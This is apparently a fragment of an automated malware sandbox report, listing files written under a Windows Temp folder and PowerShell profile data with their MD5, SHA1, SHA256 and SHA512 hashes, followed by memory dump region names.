| SHA512 | 2f213c2bba77586a5d1aa31cbc3634ce9b35f0fa6d3943fe95fc9dfbf65825025016ff981026fcfe07fef235b0a62a4d6d5478f7d6ca09e6f0556f958e76a2f2 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Downloads\WatchSwitch.jpg
| MD5 | ae7de248372fcc339ab552aa36873851 |
| SHA1 | 6458c902d9df06af3b2477d9b1f1b71e7b2e517c |
| SHA256 | f77c5fb628a187257efa27b9ee293a00c69f139a50f8a961ff19e6b6b69fe639 |
| SHA512 | 12624ecb21c7cfc850e4f4ebfef4de4324886bf79401a550f7a05783bfaa8228fe1f9dbf143e2d2e1ead1d178245beb3f8dfbfc50e598244a0728db237fb61b1 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Pictures\ProtectRepair.png
| MD5 | 5cb4019043dc4b3e5c135cb63df510e8 |
| SHA1 | e0c915df6a0ed4bfb54282afd89294b9dfa27a80 |
| SHA256 | 64b87551c2959cdbeb67b2de4c0c64aa8393a19260751acb9a45008f1071b7d3 |
| SHA512 | 855993e1ba456c580ea9f6dc6c9402ad497f9d1b320e707632e250027bf126412140db5d7a27c224b695f430f412d7b640fba48c7afd144bd1f9127ae87c6dd8 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Pictures\My Wallpaper.jpg
| MD5 | a51464e41d75b2aa2b00ca31ea2ce7eb |
| SHA1 | 5b94362ac6a23c5aba706e8bfd11a5d8bab6097d |
| SHA256 | 16d5506b6663085b1acd80644ffa5363c158e390da67ed31298b85ddf0ad353f |
| SHA512 | b2a09d52c211e7100e3e68d88c13394c64f23bf2ec3ca25b109ffb1e1a96a054f0e0d25d2f2a0c2145616eabc88c51d63023cef5faa7b49129d020f67ab0b1ff |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Pictures\ReadMount.jpg
| MD5 | 204f1bb6c725abc50f6d5c578c545470 |
| SHA1 | ad09d57a6fd3ba6ea0470ca4be4865768fb99a93 |
| SHA256 | 8da2c15ab3742171f6493134327d445b77018b4ce223a64d7b8ab24f661e481d |
| SHA512 | b820e445f2388545deb8511f27c6efc72331a2af410107cf1963b94795cb87ecd46be00ba0c9c75c4862e338a4a741a499b59f13d1d6d467b6d84b9a5a52262d |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Pictures\StopRemove.png
| MD5 | 16800664fe0bbedf6fc67e637647a408 |
| SHA1 | 91a87ef6f982c6f8170369b531027b4aaf2cbe6e |
| SHA256 | ab0cefcd338e3ea4ef8cd69e25b7c184773aff35a179989bc533b96ad2410a74 |
| SHA512 | ce8c912a3db109c7de1a2f2c0386265ce922a0df1e6e3a1a3d1dc52e93d9313a52efdff0275590bebbc7b6f4398f4ba7ecac87dd5626dcc6e206bc2fdec6255e |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Pictures\SetRegister.png
| MD5 | a50ee15bc4603dfd4b27fcf39f4c6459 |
| SHA1 | 01d12043f0faa3f98aefb5f13a26946b0bc21c25 |
| SHA256 | d52f96e151d4544b4facb79bc0646eeb493532c106becf0ee513605d893a09db |
| SHA512 | bb26ae148ab6633650808f9c074b42bb665f52aee92c2daf80d7705d6177b8933f354b8e40fb77468ac4d6b76d2d5d26b6b7c68c69a6b4e9fbaefd2d5d1aae2f |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6317adf4fbc43ea2fd68861fafd57155 |
| SHA1 | 6b87c718893c83c6eed2767e8d9cbc6443e31913 |
| SHA256 | c1ead17eef37b4b461cedc276504a441489e819c7f943037f2001966aeec90af |
| SHA512 | 17229aae8622e4bfc3caaac55684f7d4ccd3162af5919c851b1d8ac4060b6bb7b75044ecee116523d05acb55197dcb60780958f629450edef386f1e6f65f49f0 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | f75bff85c7d144c6f55fe0cce837bfa7 |
| SHA1 | d7caba8d0abc1493e038d17844ef5e040652ad99 |
| SHA256 | 308413343eac3a58bf495ab9ba2cc83e06ca65a8af61e36a47c2e6a0231ebe41 |
| SHA512 | a79ba68aba98673bdddedfafe14074945adf0590988d7a5cbcabd7e966a9ca15d360b1e3ae75e0b81c65510abe45507db5040dce84456957e75b863fc39598ed |
memory/4840-384-0x00007FF7679C0000-0x00007FF768270000-memory.dmp
memory/3872-385-0x00007FF6BAF70000-0x00007FF6BBA66000-memory.dmp
memory/3872-387-0x00007FF6BAF70000-0x00007FF6BBA66000-memory.dmp
memory/3872-423-0x00007FF6BAF70000-0x00007FF6BBA66000-memory.dmp
memory/4840-427-0x00007FF7679C0000-0x00007FF768270000-memory.dmp